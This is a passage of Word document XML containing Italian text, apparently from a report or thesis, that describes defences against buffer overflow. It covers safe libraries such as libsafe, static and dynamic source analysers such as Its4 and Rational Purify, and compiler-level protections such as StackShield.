      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>safe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> sono "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libsafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libparanoia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" e "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libverify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Libsafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ad esempio, implementa una tecnica di protezione dallo stack buffer overflow basata sul controllo di eventuali alterazioni dello stack quando una funzione termina di eseguire: se lo stack risulta modificato, il processo termina con un errore di segmentazione.</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8E35E" w14:textId="100F534C" w:rsidR="0062275C" w:rsidRPr="008C1448" w:rsidRDefault="0062275C" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc76047777"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Difesa a liv</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ello di codice sorgente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="13EC3DED" w14:textId="77777777" w:rsidR="0062275C" w:rsidRPr="0062275C" w:rsidRDefault="0062275C" w:rsidP="0062275C">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esistono tool in grado di rilevare vulnerabilità al buffer overflow all'interno del codice sorgente effettuando analisi più o meno complesse sullo stesso, sia statiche che dinamiche.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910581B" w14:textId="3675349C" w:rsidR="0062275C" w:rsidRPr="0062275C" w:rsidRDefault="0062275C" w:rsidP="0062275C">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Its4" è un semplicissimo esempio di analizzatore statico che effettua la ricerca di eventuali chiamate di funzioni vulnerabili note (come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), pensato come sostituzione alla ricerca tramite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: data la sua semplicità e la rudimentale analisi del codice che realizza è molto facile incappare in falsi positivi e negativi.</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3310E7B0" w14:textId="79F7728D" w:rsidR="0062275C" w:rsidRDefault="0062275C" w:rsidP="0062275C">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In alternativa esistono tool più complessi in grado di effettuare l'analisi dinamica del programma, come "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rational</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Purify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>", un debugger di memoria realizzato da IBM in grado di individuare eventuali anomalie nella gestione della memoria durante l'esecuzione del programma (accesso a variabili non inizializzate, </w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deallocazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> impropria di memoria, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ecc...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799893F" w14:textId="3A3CD590" w:rsidR="0062275C" w:rsidRPr="008C1448" w:rsidRDefault="0062275C" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc76047778"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa a livello di </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>compilatore</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="3993784D" w14:textId="77777777" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linguaggi di medio/basso livello come il C forniscono alte prestazioni proprio perché "risparmiano" su certi controlli che non vengono automaticamente gestiti a livello di linguaggio lasciando tale responsabilità al programmatore, e gettando dunque le basi a vulnerabilità come il buffer overflow in caso di mancanza dei controlli sulle dimensioni dei buffer durante gli accessi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B00FB" w14:textId="67BA50DD" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Una delle tecniche di difesa da queste anomalie è prevedere che sia il compilatore ad inserire le verifiche sulla dimensione di tutti i buffer nel codice compilato senza richiedere alcuna modifica al codice sorgente, ma solo al compilatore, a scapito però dei tempi che possono aumentare anche di più del 200%. Questa fu la direzione intrapresa da due differenti progetti di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>patching</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al compilatore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE18350" w14:textId="7F37BF67" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Approccio differente è invece quello di "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StackShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>", un'estensione del compilatore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per la protezione dallo stack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smashing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nei sistemi Linux; anziché inserire a tempo di compilazione i controlli per il </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bounds checking</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dei buffer, l'obiettivo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StackShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> è quello di impedire la sovrascrittura dei </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
